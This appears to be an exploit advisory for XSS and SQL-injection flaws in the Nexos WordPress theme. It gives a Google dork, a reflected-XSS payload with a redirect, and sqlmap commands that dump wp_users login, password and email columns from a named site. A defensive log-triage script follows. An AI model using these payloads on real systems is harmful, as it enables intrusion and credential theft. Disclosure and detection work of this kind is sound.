CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-15363 | CWE-79 | $500 | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-06-29 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.03569 | 0.76323 |

[+] Exploit Title: Nexos - Real Estate WordPress Theme v1.7 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/nexos/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
[+] Software Version: 1.7
[+] Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
[+] Tested on: Debian 10
[+] CVE: CVE-2020-15363, CVE-2020-15364
[+] CWE: CWE-79, CWE-89

### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS
[x] SQL Injection

### [ PoC Unauthenticated Reflected XSS: ]

[!] https://listing-themes.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLDVCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>

[!] GET /nexos-wp/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
Host: listing-themes.com

### [ PoC SQL Injection: ]

[!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4

[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema

[!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8

Database: geniuscr_nexos
Table: wp_users
[9 entries]

### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
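
A defender-side check for the two parameters named in the PoCs above, as an added example (not part of the original advisory or the theme's code): it triages web-server access-log lines and flags `search_order` values that are not a plain column and direction, and `search_location` values carrying HTML metacharacters. The log lines are constructed, and the rule that a legitimate `search_order` always looks like `idlisting DESC` is an assumption inferred from the PoC URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate search_order is "<column>" or "<column> ASC|DESC",
# as in the PoC URLs. Anything else is worth a look.
ORDER_OK = re.compile(r"[A-Za-z_][A-Za-z0-9_]*( (ASC|DESC))?", re.IGNORECASE)
# Characters needed to close an HTML attribute or open a tag.
MARKUP = re.compile(r'[<>"]')
# Request line inside a combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jun/2020:10:00:01 +0000] "GET /nexos-wp/top-map/'
    '?search_order=idlisting%20DESC&search_location=Zagreb HTTP/1.1" 200 5120',
    '192.0.2.11 - - [29/Jun/2020:10:00:07 +0000] "GET /nexos-wp/top-map/'
    '?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%3E'
    ' HTTP/1.1" 200 5180',
    '192.0.2.12 - - [29/Jun/2020:10:00:09 +0000] "GET /nexos-wp/side-map/'
    '?search_order=idlisting%20DESC%2C(select%201) HTTP/1.1" 200 4990',
]

def triage(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    match = REQUEST.search(line)
    if not match:
        return []
    # parse_qs percent-decodes values, so encoded payloads are checked too.
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    findings = []
    for value in query.get("search_order", []):
        if not ORDER_OK.fullmatch(value.strip()):
            findings.append("search_order: not a plain column/direction")
    for value in query.get("search_location", []):
        if MARKUP.search(value):
            findings.append("search_location: HTML metacharacters")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line with a finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = triage(line)
        if findings:
            hits.append((number, findings))
    return hits

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, "; ".join(findings))
```

The same allow-list pattern for `search_order` and output escaping for `search_location` are the corresponding server-side fixes; the log check only shows where the parameters have already been probed.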